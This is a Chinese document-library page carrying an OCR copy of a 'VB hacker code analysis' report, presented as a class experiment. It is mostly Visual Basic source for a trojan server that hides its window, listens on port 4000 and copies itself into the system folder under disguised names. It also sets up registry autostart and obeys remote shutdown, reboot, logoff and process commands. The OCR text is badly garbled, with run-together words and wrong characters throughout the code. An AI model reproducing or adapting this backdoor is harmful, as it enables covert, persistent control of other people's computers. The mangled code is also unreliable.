欢迎来到天天文库
浏览记录
ID:44416939
大小:253.85 KB
页数:13页
时间:2019-10-21
《VB黑客代码分析》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库。
1、木次试验的软件设计部分,分为客户端和服务端两个部分的设计,设计过程中的详细代码以及分析过程如下:服务端的代码设计:首先,新建一工程,名为Server,新建一个窗体,Name为frmServer,在窗体中加入一个winsock控件,Name设为sckServer,协议设为默认的TCP/IP协议。接下来我们回来frmServer窗体模块中,添加如下代码:PrivateSubFORMLoad()WithMe.sckServer.LocalPort二4000'端口号.sckServer.Listen'开始监听Me.Hide'在背后运行DimsCurrentPathAsS
2、tring,sSystemDirAsStringsCurrentPath=App・Path&&App・EXEName&〃・exe〃sSystemDir=“C:windowssystem”OnErrorResumeNextFileCopysCurrentPath,sSystemDir&〃Systrsy.exe〃'复制文件成系统冃录下的Systrsy.exeOnErrorResumeNextFi1eCopysCurrentPath,sSystemDir&〃txtView.exe〃'复制文件成系统目录下的txtView.exeCallstartupGroup'
3、调用注册表启动函数CallWriteToTxt"调用写入注册表函数IfApp.PrevlnstanceThen'判断程序是否下在运行End'如果已经运行就退出EndIfEndWithEndSubPrivateSubsckServerCormectionRequest(ByVairequestIDAsLong)'接受客户端的连接请求WithMeIf・sckServer.StateOsckClosedThen・sckServer.Close.sckServer.Accept(requestID)"打开端口侦听端口的状态EndWithEndSub在frmServer中
4、添加sckServer的DataArrial事件,接收客户端的请求,并完成各种操作。PrivateSubsckServer_DataArrival(ByVaibytesTotalAsLong)DimstrDataAsStringWithMe.sckServer・GetDatastrDataSelectCasestrDataCase"Exit"'获取数据信息'根据具体的信息执行对应的操作Shell"shutdown-s-t0〃'实现关机Case"Reboot/Shell"shutdown-r一t0〃"实现重启'实现注销Case〃Logoff〃shell〃shutd
5、ownT—t0〃Shell"C:WIND0WSsystem32otepad.exe"Shell"C:WIND0WSsystein32calc.exe〃'打开记事木'打开计算器c〃Ci•〃CaseGuanbi'实现关闭Shell,ztaskkill/imnotepad・exe"Shellz,taskkill/imcalc・exe〃EndSelect'关闭记事木“关闭计算器EndWithEndSub把服务端加入到注册表的启动组中,让它一开机就自动运行回到Server工程中的modApi中加入如下API函数:PublicDeclareFunctionRe
6、gOpenKeyLib,zadvapi32・Alias"RegOpenKeyA"(ByVaihKeyAsLong,ByVaiIpSubKeyAsString,phkResultAsLong)AsLongPublicDeclareFunctionRegSetvalueExLibz/advapi32.dl1〃Alias"RegSetvalueExA"(ByVaihKeyAsLong,ByVailpvalueNameAsString,ByVaiReservedAsLong,ByVaidwTypeAsLong,lpDataAsAny,ByVaicbDataAsLong)
7、AsLongPublicDeclareFunctionRegCreateKeyLib,?advapi32・dll,zAlias,zRegCreateKeyA,/(ByVaihKeyAsLong,ByVaiIpSubKeyAsString,phkResultAsLong)AsLongPublicConstREG_BTNARY二3PublicConstREG_SZ二1PublicConstHKEY_LOCAL_MACHINE=&H80000002PublicConstHKEYCLASSESROOT=&H80000000写到注册表启动组中的过程。PublicSubSt
8、artupGroup()
此文档下载收益归作者所有